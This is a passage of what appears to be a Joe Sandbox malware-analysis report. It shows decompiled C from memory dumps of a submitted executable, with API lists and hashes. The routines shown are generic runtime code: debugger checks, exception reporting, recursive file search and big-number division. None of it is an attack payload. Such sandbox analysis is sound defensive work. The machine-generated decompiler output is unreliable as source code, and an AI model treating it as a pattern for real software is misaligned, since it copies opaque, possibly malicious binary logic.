                                                    				if(IsProcessorFeaturePresent(0x17) != 0) {
                                                    					_t55 = _a4;
                                                    					asm("int 0x29");
                                                    				}
                                                    				E00CDFA46(_t34);
                                                    				 *_t60 = 0x2cc;
                                                    				_v632 = E00CDFFF0(_t58,  &_v808, 0, 3);
                                                    				_v636 = _t55;
                                                    				_v640 = _t57;
                                                    				_v644 = _t51;
                                                    				_v648 = _t59;
                                                    				_v652 = _t58;
                                                    				_v608 = ss;
                                                    				_v620 = cs;
                                                    				_v656 = ds;
                                                    				_v660 = es;
                                                    				_v664 = fs;
                                                    				_v668 = gs;
                                                    				asm("pushfd");
                                                    				_pop( *_t15);
                                                    				_v624 = _v0;
                                                    				_t39 =  &_v0;
                                                    				_v612 = _t39;
                                                    				_v808 = 0x10001;
                                                    				_v628 =  *((intOrPtr*)(_t39 - 4));
                                                    				E00CDFFF0(_t58,  &_v92, 0, 0x50);
                                                    				_v92 = 0x40000015;
                                                    				_v88 = 1;
                                                    				_v80 = _v0;
                                                    				_t28 = IsDebuggerPresent() - 1; // -1
                                                    				_v12.ExceptionRecord =  &_v92;
                                                    				asm("sbb bl, bl");
                                                    				_v12.ContextRecord =  &_v808;
                                                    				_t54 =  ~_t28 + 1;
                                                    				SetUnhandledExceptionFilter(0);
                                                    				_t49 = UnhandledExceptionFilter( &_v12);
                                                    				if(_t49 == 0 && _t54 == 0) {
                                                    					_push(3);
                                                    					return E00CDFA46(_t49);
                                                    				}
                                                    				return _t49;
                                                    			}

                                                    APIs
                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00CDF844
                                                    • IsDebuggerPresent.KERNEL32 ref: 00CDF910
                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00CDF930
                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 00CDF93A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                    • String ID:
                                                    • API String ID: 254469556-0
                                                    • Opcode ID: 7cf94cbc9fc8af74227aca1d3c7f7dbc9681c427b025e67e83f0adc2bd57c167
                                                    • Instruction ID: 6fcebeddfc2d6d0ae72d75bc2219cba86a1bef691bc648703e298b4e918354f1
                                                    • Opcode Fuzzy Hash: 7cf94cbc9fc8af74227aca1d3c7f7dbc9681c427b025e67e83f0adc2bd57c167
                                                    • Instruction Fuzzy Hash: 9A310575D05219ABDB21DFA4D989BCCBBB8BF08304F1040AAE50DAB350EB719B85DF45
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 83%
                                                    			E00CDE6A3(signed int _a4, signed int _a8) {
                                                    				struct _MEMORY_BASIC_INFORMATION _v32;
                                                    				struct _SYSTEM_INFO _v68;
                                                    				long _t20;
                                                    				signed int _t28;
                                                    				void* _t30;
                                                    				signed int _t32;
                                                    				signed int _t40;
                                                    				signed int _t45;
                                                    
                                                    				_t20 = VirtualQuery(_a4,  &_v32, 0x1c);
                                                    				if(_t20 == 0) {
                                                    					_push(0x19);
                                                    					asm("int 0x29");
                                                    				}
                                                    				if((_v32.Protect & 0x00000044) != 0) {
                                                    					GetSystemInfo( &_v68);
                                                    					_t40 = _v68.dwPageSize;
                                                    					_t32 = _t40 - 1;
                                                    					_t45 =  !_t32 & _a4;
                                                    					_t28 = _a8 / _t40;
                                                    					_t30 = ((_t32 & _a4) + _t40 + (_t32 & _a8) - 1) / _t40 + _t28;
                                                    					if(_t30 == 0) {
                                                    						L5:
                                                    						return _t28;
                                                    					} else {
                                                    						goto L4;
                                                    					}
                                                    					do {
                                                    						L4:
                                                    						_t28 = 0;
                                                    						asm("lock or [esi], eax");
                                                    						_t45 = _t45 + _t40;
                                                    						_t30 = _t30 - 1;
                                                    					} while (_t30 != 0);
                                                    					goto L5;
                                                    				}
                                                    				return _t20;
                                                    			}

                                                    APIs
                                                    • VirtualQuery.KERNEL32(80000000,00CDE5E8,0000001C,00CDE7DD,00000000,?,?,?,?,?,?,?,00CDE5E8,00000004,00D21CEC,00CDE86D), ref: 00CDE6B4
                                                    • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00CDE5E8,00000004,00D21CEC,00CDE86D), ref: 00CDE6CF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: InfoQuerySystemVirtual
                                                    • String ID: D
                                                    • API String ID: 401686933-2746444292
                                                    • Opcode ID: 94f96072df3cf765b2baa05dc1aa45b6768562f803a3e4a90b6aa93d91978387
                                                    • Instruction ID: f26e6ca273113e2141d5a8a97f57c9286f3e72418a144a8afff28d1bdc046691
                                                    • Opcode Fuzzy Hash: 94f96072df3cf765b2baa05dc1aa45b6768562f803a3e4a90b6aa93d91978387
                                                    • Instruction Fuzzy Hash: AF01DB726001096BDF14EE29DC49BED7BBAEFC4324F0DC125EE69DB254D634DA05C690
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 79%
                                                    			E00CE8EBD(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                    				char _v0;
                                                    				signed int _v8;
                                                    				intOrPtr _v524;
                                                    				intOrPtr _v528;
                                                    				void* _v532;
                                                    				intOrPtr _v536;
                                                    				char _v540;
                                                    				intOrPtr _v544;
                                                    				intOrPtr _v548;
                                                    				intOrPtr _v552;
                                                    				intOrPtr _v556;
                                                    				intOrPtr _v560;
                                                    				intOrPtr _v564;
                                                    				intOrPtr _v568;
                                                    				intOrPtr _v572;
                                                    				intOrPtr _v576;
                                                    				intOrPtr _v580;
                                                    				intOrPtr _v584;
                                                    				char _v724;
                                                    				intOrPtr _v792;
                                                    				intOrPtr _v800;
                                                    				char _v804;
                                                    				intOrPtr _v808;
                                                    				char _v812;
                                                    				void* __edi;
                                                    				signed int _t40;
                                                    				char* _t47;
                                                    				intOrPtr _t49;
                                                    				intOrPtr _t60;
                                                    				intOrPtr _t61;
                                                    				intOrPtr _t65;
                                                    				intOrPtr _t66;
                                                    				int _t67;
                                                    				intOrPtr _t68;
                                                    				signed int _t69;
                                                    
                                                    				_t68 = __esi;
                                                    				_t65 = __edx;
                                                    				_t60 = __ebx;
                                                    				_t40 =  *0xcfe7ac; // 0x349e4b74
                                                    				_t41 = _t40 ^ _t69;
                                                    				_v8 = _t40 ^ _t69;
                                                    				if(_a4 != 0xffffffff) {
                                                    					_push(_a4);
                                                    					E00CDFA46(_t41);
                                                    					_pop(_t61);
                                                    				}
                                                    				E00CDFFF0(_t66,  &_v804, 0, 0x50);
                                                    				E00CDFFF0(_t66,  &_v724, 0, 0x2cc);
                                                    				_v812 =  &_v804;
                                                    				_t47 =  &_v724;
                                                    				_v808 = _t47;
                                                    				_v548 = _t47;
                                                    				_v552 = _t61;
                                                    				_v556 = _t65;
                                                    				_v560 = _t60;
                                                    				_v564 = _t68;
                                                    				_v568 = _t66;
                                                    				_v524 = ss;
                                                    				_v536 = cs;
                                                    				_v572 = ds;
                                                    				_v576 = es;
                                                    				_v580 = fs;
                                                    				_v584 = gs;
                                                    				asm("pushfd");
                                                    				_pop( *_t22);
                                                    				_v540 = _v0;
                                                    				_t25 =  &_v0; // 0x7
                                                    				_t49 = _t25;
                                                    				_v528 = _t49;
                                                    				_v724 = 0x10001;
                                                    				_v544 =  *((intOrPtr*)(_t49 - 4));
                                                    				_v804 = _a8;
                                                    				_v800 = _a12;
                                                    				_v792 = _v0;
                                                    				_t67 = IsDebuggerPresent();
                                                    				SetUnhandledExceptionFilter(0);
                                                    				_t36 =  &_v812; // -805
                                                    				if(UnhandledExceptionFilter(_t36) == 0 && _t67 == 0 && _a4 != 0xffffffff) {
                                                    					_push(_a4);
                                                    					_t57 = E00CDFA46(_t57);
                                                    				}
                                                    				return E00CDFBBC(_t57, _t60, _v8 ^ _t69, _t65, _t67, _t68);
                                                    			}

                                                    APIs
                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00CE8FB5
                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00CE8FBF
                                                    • UnhandledExceptionFilter.KERNEL32(-00000325,?,?,?,?,?,00000000), ref: 00CE8FCC
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                    • String ID:
                                                    • API String ID: 3906539128-0
                                                    • Opcode ID: 4241b8401ba2270a213ed99c23e3dfaaec0f5d930f35ccbc0a582ba7799402cc
                                                    • Instruction ID: 118f242b147a4089c9d29f1e4edc54909f5b5d399a371ad9a92371d69eb81af4
                                                    • Opcode Fuzzy Hash: 4241b8401ba2270a213ed99c23e3dfaaec0f5d930f35ccbc0a582ba7799402cc
                                                    • Instruction Fuzzy Hash: 1231C275901228ABCB21DF65DC89BDDBBB8BF08310F5041EAE41CA7250EB709F858F55
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 71%
                                                    			E00CEB348(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
                                                    				intOrPtr _v8;
                                                    				signed int _v12;
                                                    				intOrPtr* _v32;
                                                    				CHAR* _v36;
                                                    				signed int _v48;
                                                    				char _v286;
                                                    				signed int _v287;
                                                    				struct _WIN32_FIND_DATAA _v332;
                                                    				intOrPtr* _v336;
                                                    				signed int _v340;
                                                    				signed int _v344;
                                                    				intOrPtr _v372;
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				signed int _t35;
                                                    				signed int _t40;
                                                    				signed int _t43;
                                                    				intOrPtr _t45;
                                                    				signed char _t47;
                                                    				intOrPtr* _t55;
                                                    				union _FINDEX_INFO_LEVELS _t57;
                                                    				union _FINDEX_INFO_LEVELS _t58;
                                                    				signed int _t62;
                                                    				signed int _t65;
                                                    				void* _t71;
                                                    				void* _t73;
                                                    				signed int _t74;
                                                    				void* _t77;
                                                    				CHAR* _t78;
                                                    				void* _t79;
                                                    				intOrPtr* _t82;
                                                    				intOrPtr _t84;
                                                    				void* _t86;
                                                    				intOrPtr* _t87;
                                                    				signed int _t91;
                                                    				signed int _t95;
                                                    				void* _t100;
                                                    				signed int _t103;
                                                    				union _FINDEX_INFO_LEVELS _t104;
                                                    				void* _t105;
                                                    				void* _t108;
                                                    				void* _t109;
                                                    				intOrPtr _t110;
                                                    				void* _t111;
                                                    				void* _t112;
                                                    				signed int _t116;
                                                    				void* _t117;
                                                    				signed int _t118;
                                                    				void* _t119;
                                                    				void* _t120;
                                                    
                                                    				_push(__ecx);
                                                    				_t82 = _a4;
                                                    				_t2 = _t82 + 1; // 0x1
                                                    				_t100 = _t2;
                                                    				do {
                                                    					_t35 =  *_t82;
                                                    					_t82 = _t82 + 1;
                                                    				} while (_t35 != 0);
                                                    				_t103 = _a12;
                                                    				_t84 = _t82 - _t100 + 1;
                                                    				_v8 = _t84;
                                                    				if(_t84 <= (_t35 | 0xffffffff) - _t103) {
                                                    					_t5 = _t103 + 1; // 0x1
                                                    					_t77 = _t5 + _t84;
                                                    					_t109 = E00CEB136(_t84, _t77, 1);
                                                    					_t86 = _t108;
                                                    					__eflags = _t103;
                                                    					if(_t103 == 0) {
                                                    						L6:
                                                    						_push(_v8);
                                                    						_t77 = _t77 - _t103;
                                                    						_t40 = E00CEF101(_t86, _t109 + _t103, _t77, _a4);
                                                    						_t118 = _t117 + 0x10;
                                                    						__eflags = _t40;
                                                    						if(__eflags != 0) {
                                                    							goto L9;
                                                    						} else {
                                                    							_t71 = E00CEB587(_a16, _t100, __eflags, _t109);
                                                    							E00CE8DCC(0);
                                                    							_t73 = _t71;
                                                    							goto L8;
                                                    						}
                                                    					} else {
                                                    						_push(_t103);
                                                    						_t74 = E00CEF101(_t86, _t109, _t77, _a8);
                                                    						_t118 = _t117 + 0x10;
                                                    						__eflags = _t74;
                                                    						if(_t74 != 0) {
                                                    							L9:
                                                    							_push(0);
                                                    							_push(0);
                                                    							_push(0);
                                                    							_push(0);
                                                    							_push(0);
                                                    							E00CE9097();
                                                    							asm("int3");
                                                    							_t116 = _t118;
                                                    							_t119 = _t118 - 0x150;
                                                    							_t43 =  *0xcfe7ac; // 0x349e4b74
                                                    							_v48 = _t43 ^ _t116;
                                                    							_t87 = _v32;
                                                    							_push(_t77);
                                                    							_t78 = _v36;
                                                    							_push(_t109);
                                                    							_t110 = _v332.cAlternateFileName;
                                                    							_push(_t103);
                                                    							_v372 = _t110;
                                                    							while(1) {
                                                    								__eflags = _t87 - _t78;
                                                    								if(_t87 == _t78) {
                                                    									break;
                                                    								}
                                                    								_t45 =  *_t87;
                                                    								__eflags = _t45 - 0x2f;
                                                    								if(_t45 != 0x2f) {
                                                    									__eflags = _t45 - 0x5c;
                                                    									if(_t45 != 0x5c) {
                                                    										__eflags = _t45 - 0x3a;
                                                    										if(_t45 != 0x3a) {
                                                    											_t87 = E00CEF150(_t78, _t87);
                                                    											continue;
                                                    										}
                                                    									}
                                                    								}
                                                    								break;
                                                    							}
                                                    							_t101 =  *_t87;
                                                    							__eflags = _t101 - 0x3a;
                                                    							if(_t101 != 0x3a) {
                                                    								L19:
                                                    								_t104 = 0;
                                                    								__eflags = _t101 - 0x2f;
                                                    								if(_t101 == 0x2f) {
                                                    									L23:
                                                    									_t47 = 1;
                                                    									__eflags = 1;
                                                    								} else {
                                                    									__eflags = _t101 - 0x5c;
                                                    									if(_t101 == 0x5c) {
                                                    										goto L23;
                                                    									} else {
                                                    										__eflags = _t101 - 0x3a;
                                                    										if(_t101 == 0x3a) {
                                                    											goto L23;
                                                    										} else {
                                                    											_t47 = 0;
                                                    										}
                                                    									}
                                                    								}
                                                    								_t89 = _t87 - _t78 + 1;
                                                    								asm("sbb eax, eax");
                                                    								_v340 =  ~(_t47 & 0x000000ff) & _t87 - _t78 + 0x00000001;
                                                    								E00CDFFF0(_t104,  &_v332, _t104, 0x140);
                                                    								_t120 = _t119 + 0xc;
                                                    								_t111 = FindFirstFileExA(_t78, _t104,  &_v332, _t104, _t104, _t104);
                                                    								_t55 = _v336;
                                                    								__eflags = _t111 - 0xffffffff;
                                                    								if(_t111 != 0xffffffff) {
                                                    									_t91 =  *((intOrPtr*)(_t55 + 4)) -  *_t55;
                                                    									__eflags = _t91;
                                                    									_t92 = _t91 >> 2;
                                                    									_v344 = _t91 >> 2;
                                                    									do {
                                                    										__eflags = _v332.cFileName - 0x2e;
                                                    										if(_v332.cFileName != 0x2e) {
                                                    											L36:
                                                    											_push(_t55);
                                                    											_t57 = E00CEB348(_t92,  &(_v332.cFileName), _t78, _v340);
                                                    											_t120 = _t120 + 0x10;
                                                    											__eflags = _t57;
                                                    											if(_t57 != 0) {
                                                    												goto L26;
                                                    											} else {
                                                    												goto L37;
                                                    											}
                                                    										} else {
                                                    											_t92 = _v287;
                                                    											__eflags = _t92;
                                                    											if(_t92 == 0) {
                                                    												goto L37;
                                                    											} else {
                                                    												__eflags = _t92 - 0x2e;
                                                    												if(_t92 != 0x2e) {
                                                    													goto L36;
                                                    												} else {
                                                    													__eflags = _v286;
                                                    													if(_v286 == 0) {
                                                    														goto L37;
                                                    													} else {
                                                    														goto L36;
                                                    													}
                                                    												}
                                                    											}
                                                    										}
                                                    										goto L40;
                                                    										L37:
                                                    										_t62 = FindNextFileA(_t111,  &_v332);
                                                    										__eflags = _t62;
                                                    										_t55 = _v336;
                                                    									} while (_t62 != 0);
                                                    									_t101 =  *_t55;
                                                    									_t95 = _v344;
                                                    									_t65 =  *((intOrPtr*)(_t55 + 4)) -  *_t55 >> 2;
                                                    									__eflags = _t95 - _t65;
                                                    									if(_t95 != _t65) {
                                                    										E00CE6310(_t78, _t101 + _t95 * 4, _t65 - _t95, 4, E00CEB1A0);
                                                    									}
                                                    								} else {
                                                    									_push(_t55);
                                                    									_t57 = E00CEB348(_t89, _t78, _t104, _t104);
                                                    									L26:
                                                    									_t104 = _t57;
                                                    								}
                                                    								__eflags = _t111 - 0xffffffff;
                                                    								if(_t111 != 0xffffffff) {
                                                    									FindClose(_t111);
                                                    								}
                                                    								_t58 = _t104;
                                                    							} else {
                                                    								__eflags = _t87 -  &(_t78[1]);
                                                    								if(_t87 ==  &(_t78[1])) {
                                                    									goto L19;
                                                    								} else {
                                                    									_push(_t110);
                                                    									_t58 = E00CEB348(_t87, _t78, 0, 0);
                                                    								}
                                                    							}
                                                    							_pop(_t105);
                                                    							_pop(_t112);
                                                    							__eflags = _v12 ^ _t116;
                                                    							_pop(_t79);
                                                    							return E00CDFBBC(_t58, _t79, _v12 ^ _t116, _t101, _t105, _t112);
                                                    						} else {
                                                    							goto L6;
                                                    						}
                                                    					}
                                                    				} else {
                                                    					_t73 = 0xc;
                                                    					L8:
                                                    					return _t73;
                                                    				}
                                                    				L40:
                                                    			}


                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: .
                                                    • API String ID: 0-248832578
                                                    • Opcode ID: cd2367347146fc7543762e54b040c93cd61d6b7d52421c0a80a29c1405c9b095
                                                    • Instruction ID: cff68884e002fb3dbcacaa3b5fa0b45133bf780ec306a264a233510e71d1a326
                                                    • Opcode Fuzzy Hash: cd2367347146fc7543762e54b040c93cd61d6b7d52421c0a80a29c1405c9b095
                                                    • Instruction Fuzzy Hash: 9731E9719002896FCB249E7ACC85EFB7BBDDF85314F1441A8F529D7292E7309E458B50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 90%
                                                    			E00CED440(signed int* _a4, signed int* _a8) {
                                                    				signed int _v8;
                                                    				signed int _v12;
                                                    				signed int _v16;
                                                    				signed int _v20;
                                                    				signed int _v24;
                                                    				signed int _v28;
                                                    				signed int _v32;
                                                    				signed int _v36;
                                                    				signed int _v40;
                                                    				signed int _v44;
                                                    				signed int _v52;
                                                    				signed int _v56;
                                                    				signed int _v60;
                                                    				signed int _v64;
                                                    				signed int _v68;
                                                    				signed int _v72;
                                                    				signed int _v76;
                                                    				signed int* _v80;
                                                    				char _v540;
                                                    				signed int _v544;
                                                    				signed int _t197;
                                                    				signed int _t198;
                                                    				signed int* _t200;
                                                    				signed int _t201;
                                                    				signed int _t204;
                                                    				signed int _t206;
                                                    				signed int _t208;
                                                    				signed int _t209;
                                                    				signed int _t213;
                                                    				signed int _t219;
                                                    				intOrPtr _t225;
                                                    				void* _t228;
                                                    				signed int _t230;
                                                    				signed int _t247;
                                                    				signed int _t250;
                                                    				void* _t253;
                                                    				signed int _t256;
                                                    				signed int* _t262;
                                                    				signed int _t263;
                                                    				signed int _t264;
                                                    				void* _t265;
                                                    				intOrPtr* _t266;
                                                    				signed int _t267;
                                                    				signed int _t269;
                                                    				signed int _t270;
                                                    				signed int _t271;
                                                    				signed int _t272;
                                                    				signed int* _t274;
                                                    				signed int* _t278;
                                                    				signed int _t279;
                                                    				signed int _t280;
                                                    				intOrPtr _t282;
                                                    				void* _t286;
                                                    				signed char _t292;
                                                    				signed int _t295;
                                                    				signed int _t303;
                                                    				signed int _t306;
                                                    				signed int _t307;
                                                    				signed int _t309;
                                                    				signed int _t311;
                                                    				signed int _t313;
                                                    				intOrPtr* _t314;
                                                    				signed int _t318;
                                                    				signed int _t322;
                                                    				signed int* _t328;
                                                    				signed int _t330;
                                                    				signed int _t331;
                                                    				signed int _t333;
                                                    				void* _t334;
                                                    				signed int _t336;
                                                    				signed int _t338;
                                                    				signed int _t341;
                                                    				signed int _t342;
                                                    				signed int* _t344;
                                                    				signed int _t349;
                                                    				signed int _t351;
                                                    				void* _t355;
                                                    				signed int _t359;
                                                    				signed int _t360;
                                                    				signed int _t362;
                                                    				signed int* _t368;
                                                    				signed int* _t369;
                                                    				signed int* _t370;
                                                    				signed int* _t373;
                                                    
                                                    				_t262 = _a4;
                                                    				_t197 =  *_t262;
                                                    				if(_t197 != 0) {
                                                    					_t328 = _a8;
                                                    					_t267 =  *_t328;
                                                    					__eflags = _t267;
                                                    					if(_t267 != 0) {
                                                    						_t3 = _t197 - 1; // -1
                                                    						_t349 = _t3;
                                                    						_t4 = _t267 - 1; // -1
                                                    						_t198 = _t4;
                                                    						_v16 = _t349;
                                                    						__eflags = _t198;
                                                    						if(_t198 != 0) {
                                                    							__eflags = _t198 - _t349;
                                                    							if(_t198 > _t349) {
                                                    								L23:
                                                    								__eflags = 0;
                                                    								return 0;
                                                    							} else {
                                                    								_t46 = _t198 + 1; // 0x0
                                                    								_t306 = _t349 - _t198;
                                                    								_v60 = _t46;
                                                    								_t269 = _t349;
                                                    								__eflags = _t349 - _t306;
                                                    								if(_t349 < _t306) {
                                                    									L21:
                                                    									_t306 = _t306 + 1;
                                                    									__eflags = _t306;
                                                    								} else {
                                                    									_t368 =  &(_t262[_t349 + 1]);
                                                    									_t341 =  &(( &(_t328[_t269 - _t306]))[1]);
                                                    									__eflags = _t341;
                                                    									while(1) {
                                                    										__eflags =  *_t341 -  *_t368;
                                                    										if( *_t341 !=  *_t368) {
                                                    											break;
                                                    										}
                                                    										_t269 = _t269 - 1;
                                                    										_t341 = _t341 - 4;
                                                    										_t368 = _t368 - 4;
                                                    										__eflags = _t269 - _t306;
                                                    										if(_t269 >= _t306) {
                                                    											continue;
                                                    										} else {
                                                    											goto L21;
                                                    										}
                                                    										goto L22;
                                                    									}
                                                    									_t369 = _a8;
                                                    									_t54 = (_t269 - _t306) * 4; // 0xfc23b5a
                                                    									__eflags =  *((intOrPtr*)(_t369 + _t54 + 4)) -  *((intOrPtr*)(_t262 + 4 + _t269 * 4));
                                                    									if( *((intOrPtr*)(_t369 + _t54 + 4)) <  *((intOrPtr*)(_t262 + 4 + _t269 * 4))) {
                                                    										goto L21;
                                                    									}
                                                    								}
                                                    								L22:
                                                    								__eflags = _t306;
                                                    								if(__eflags != 0) {
                                                    									_t330 = _v60;
                                                    									_t200 = _a8;
                                                    									_t351 =  *(_t200 + _t330 * 4);
                                                    									_t64 = _t330 * 4; // 0xffffe9e5
                                                    									_t201 =  *((intOrPtr*)(_t200 + _t64 - 4));
                                                    									_v36 = _t201;
                                                    									asm("bsr eax, esi");
                                                    									_v56 = _t351;
                                                    									if(__eflags == 0) {
                                                    										_t270 = 0x20;
                                                    									} else {
                                                    										_t270 = 0x1f - _t201;
                                                    									}
                                                    									_v40 = _t270;
                                                    									_v64 = 0x20 - _t270;
                                                    									__eflags = _t270;
                                                    									if(_t270 != 0) {
                                                    										_t292 = _v40;
                                                    										_v36 = _v36 << _t292;
                                                    										_v56 = _t351 << _t292 | _v36 >> _v64;
                                                    										__eflags = _t330 - 2;
                                                    										if(_t330 > 2) {
                                                    											_t79 = _t330 * 4; // 0xe850ffff
                                                    											_t81 =  &_v36;
                                                    											 *_t81 = _v36 |  *(_a8 + _t79 - 8) >> _v64;
                                                    											__eflags =  *_t81;
                                                    										}
                                                    									}
                                                    									_v76 = 0;
                                                    									_t307 = _t306 + 0xffffffff;
                                                    									__eflags = _t307;
                                                    									_v32 = _t307;
                                                    									if(_t307 < 0) {
                                                    										_t331 = 0;
                                                    										__eflags = 0;
                                                    									} else {
                                                    										_t85 =  &(_t262[1]); // 0x4
                                                    										_v20 =  &(_t85[_t307]);
                                                    										_t206 = _t307 + _t330;
                                                    										_t90 = _t262 - 4; // -4
                                                    										_v12 = _t206;
                                                    										_t278 = _t90 + _t206 * 4;
                                                    										_v80 = _t278;
                                                    										do {
                                                    											__eflags = _t206 - _v16;
                                                    											if(_t206 > _v16) {
                                                    												_t207 = 0;
                                                    												__eflags = 0;
                                                    											} else {
                                                    												_t207 = _t278[2];
                                                    											}
                                                    											__eflags = _v40;
                                                    											_t311 = _t278[1];
                                                    											_t279 =  *_t278;
                                                    											_v52 = _t207;
                                                    											_v44 = 0;
                                                    											_v8 = _t207;
                                                    											_v24 = _t279;
                                                    											if(_v40 > 0) {
                                                    												_t318 = _v8;
                                                    												_t336 = _t279 >> _v64;
                                                    												_t230 = E00CDF0C0(_t311, _v40, _t318);
                                                    												_t279 = _v40;
                                                    												_t207 = _t318;
                                                    												_t311 = _t336 | _t230;
                                                    												_t359 = _v24 << _t279;
                                                    												__eflags = _v12 - 3;
                                                    												_v8 = _t318;
                                                    												_v24 = _t359;
                                                    												if(_v12 >= 3) {
                                                    													_t279 = _v64;
                                                    													_t360 = _t359 |  *(_t262 + (_v60 + _v32) * 4 - 8) >> _t279;
                                                    													__eflags = _t360;
                                                    													_t207 = _v8;
                                                    													_v24 = _t360;
                                                    												}
                                                    											}
                                                    											_t208 = E00CF21C0(_t311, _t207, _v56, 0);
                                                    											_v44 = _t262;
                                                    											_t263 = _t208;
                                                    											_v44 = 0;
                                                    											_t209 = _t311;
                                                    											_v8 = _t263;
                                                    											_v28 = _t209;
                                                    											_t333 = _t279;
                                                    											_v72 = _t263;
                                                    											_v68 = _t209;
                                                    											__eflags = _t209;
                                                    											if(_t209 != 0) {
                                                    												L40:
                                                    												_t264 = _t263 + 1;
                                                    												asm("adc eax, 0xffffffff");
                                                    												_t333 = _t333 + E00CDF0E0(_t264, _t209, _v56, 0);
                                                    												asm("adc esi, edx");
                                                    												_t263 = _t264 | 0xffffffff;
                                                    												_t209 = 0;
                                                    												__eflags = 0;
                                                    												_v44 = 0;
                                                    												_v8 = _t263;
                                                    												_v72 = _t263;
                                                    												_v28 = 0;
                                                    												_v68 = 0;
                                                    											} else {
                                                    												__eflags = _t263 - 0xffffffff;
                                                    												if(_t263 > 0xffffffff) {
                                                    													goto L40;
                                                    												}
                                                    											}
                                                    											__eflags = 0;
                                                    											if(0 <= 0) {
                                                    												if(0 < 0) {
                                                    													goto L44;
                                                    												} else {
                                                    													__eflags = _t333 - 0xffffffff;
                                                    													if(_t333 <= 0xffffffff) {
                                                    														while(1) {
                                                    															L44:
                                                    															_v8 = _v24;
                                                    															_t228 = E00CDF0E0(_v36, 0, _t263, _t209);
                                                    															__eflags = _t311 - _t333;
                                                    															if(__eflags < 0) {
                                                    																break;
                                                    															}
                                                    															if(__eflags > 0) {
                                                    																L47:
                                                    																_t209 = _v28;
                                                    																_t263 = _t263 + 0xffffffff;
                                                    																_v72 = _t263;
                                                    																asm("adc eax, 0xffffffff");
                                                    																_t333 = _t333 + _v56;
                                                    																__eflags = _t333;
                                                    																_v28 = _t209;
